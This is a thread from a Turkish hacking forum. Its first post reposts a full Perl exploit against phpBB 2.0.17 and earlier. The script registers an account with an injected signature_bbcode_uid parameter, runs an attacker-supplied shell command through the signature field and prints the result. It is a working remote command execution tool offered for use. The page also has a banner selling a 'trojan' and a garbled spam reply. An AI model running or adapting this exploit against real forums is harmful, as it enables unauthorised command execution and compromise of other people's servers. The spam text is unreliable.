phpBB <= 2.0.17 (signature_bbcode_uid) Remote Command Exploit#!/usr/bin/perl # phpBB <= 2.0.17 remote command execution exploit # need for work: # 1. PHP 5 < 5.0.5 # 2. register_globals=On # 3. magic_quotes off # ------------------------------------------------ # (c)oded
Konu ReVeR_TuRK tarafından açılmış, 629 kişi tarafından görüntülenip, 4 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
phpBB <= 2.0.17 (signature_bbcode_uid) Remote Command Exploit konusundaki toplam yorum: 4, okunma sayısı: 629. |
|
|
|||||||||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Dec 2005
Üye numarası: #43403 Yer: Siz,Yolsuz,AmaÇSız ve reel hayatta yolunu kaybetmiş ÇeVRiMPiçiYim ben..Bu HeRiFi Biri Durdurmazsa...
Mesaj sayısı: 234
Karma etkisi: 7
![]() Karma: 48
|
Kod:
#!/usr/bin/perl
# phpBB <= 2.0.17 remote command execution exploit
# need for work:
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
# ------------------------------------------------
# (c)oded by 1dt.w0lf
# RST/GHC
# http://rst.void.ru
# http://ghc.ru
# 03.11.05
use LWP::UserAgent;
use HTTP::Cookies;
if(@ARGV < 2) { usage(); }
head();
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
for($i=0;$i<5;$i++)
{
$rand .= int(rand(9));
}
$name = 'r57phpBB2017xpl'.$rand;
$password = 'r57phpBB2017xpl'.$rand;
$path = $ARGV[0];
$cmd = $ARGV[1];
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post(
$path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00',
Content => [
'username' => $name,
'email' => $rand.'_bill_gates@microsoft.com',
'new_password' => $password,
'password_confirm' => $password,
'signature' => 'r57:`'.$cmd.'`',
'viewemail' => '0',
'hideonline' => '1',
'notifyreply' => '0',
'notifypm' => '0',
'popup_pm' => '0',
'attachsig' => '0',
'allowbbcode' => '1',
'allowhtml' => '1',
'allowsmilies' => '0',
'mode' => 'register',
'agreed' => 'true',
'coppa' => '0',
'submit' => 'Submit',
],
);
if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); }
else { print "Done. User $name successfully registered!\r\n"; }
$res = $xpl->post(
$path.'login.php',
Content => [
'username' => $name,
'password' => $password,
'redirect' => '',
'login' => 'Log in',
],Referer => $path.'login.php');
$res = $xpl->get($path.'profile.php?mode=editprofile');
@content = split("\n",$res->content);
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
for(@content)
{
if(/<\/textarea>/) { $p = 0; }
print $_."\r\n" if $p;
if(/<textarea name="signature"/){ $p = 1; }
}
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
}
sub usage()
{
head();
print " Usage: r57phpBB2017.pl <path> <cmd>\r\n";
print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n";
print " <cmd> - Command for execute\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
exit();
}
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=47156 Alıntıdır.. |
|
|
|
|
|
#2 |
|
Banned
![]() ![]() ![]() Kayıt Tarihi: Mar 2006
Üye numarası: #54680 Yer: MSN/Yahoo/ICQ Hacking
Mesaj sayısı: 435
Karma etkisi: 0
![]() ![]() Karma: 107
|
![]() |
|
|
|
|
|
#3 |
|
Banned
![]() ![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #2763
Mesaj sayısı: 1,356
Karma etkisi: 0
![]() ![]() ![]() ![]() ![]() ![]() Karma: 602
|
biri tesekkur etmıs dıgerıde bu dokumanın kaynak kodunu vermıs sencekodu veren arkadas bıraz daha acıklama gerekmezmı.tesekkur eden arkadas sen bu koddan ne anladın
|
|
|
|
|
|
#4 |
|
Elit Üye
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Jan 2006
Üye numarası: #47520 Yer: denizde
Mesaj sayısı: 24,474
Karma etkisi: 61554
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 6152345
|
be bişi anlamdım açıklam yokmu
|
|
|
|
|
|
#5 |
|
Çırak
![]() Kayıt Tarihi: Mar 2012
Üye numarası: #595484
Mesaj sayısı: 1
Karma etkisi: 0
![]() Karma: 10
|
Adamlar her seyin yolunda Hi ? Su anda ben inanilmaz forumu burada , bu forumda benim ilk yazi sizin oldugunuz yapiyorum :)
Bu benim tanitimina gidelim , ben Andrew degilim, ben Diplome alabilirsiniz böylece simdi Sanatlarzamanda diger ülke bir dönem aliyorum , Cambridge degilim. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=47156 Ben de lol uyku gibi futbol tapiyorum , ben de çok zevk Muse ,zaman benim en büyük Hobbie birçogunuz gibi , poker ... Ben düsünüyorum .... gibi sihirlitoplama . Sizi yaptiginiz sekilde benim kisisel kendi yönetim kurulu için fikir bulmak için buraya geldimana nedeni burada çok ilginç tartismalar var, ama gerçekten benforumdatartismalar tüm ciddi mesgul olacak! ! Ben de yazarken için buradakullanicilar ile iletisim kurmak için bulunantek yoluydu özür zorunda kalacak .... Vezaman ben yazilan tüm sahip oldugumuz varlik , ben vardiya çalismak ve simdi biraz dinlenme olacaktir .............. Sadece benim ilk yazi size apreciated atlamali neden olur. Hepinize untill sonraki sonrasi , Hosçakal! |
|
|
|
![]() |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|
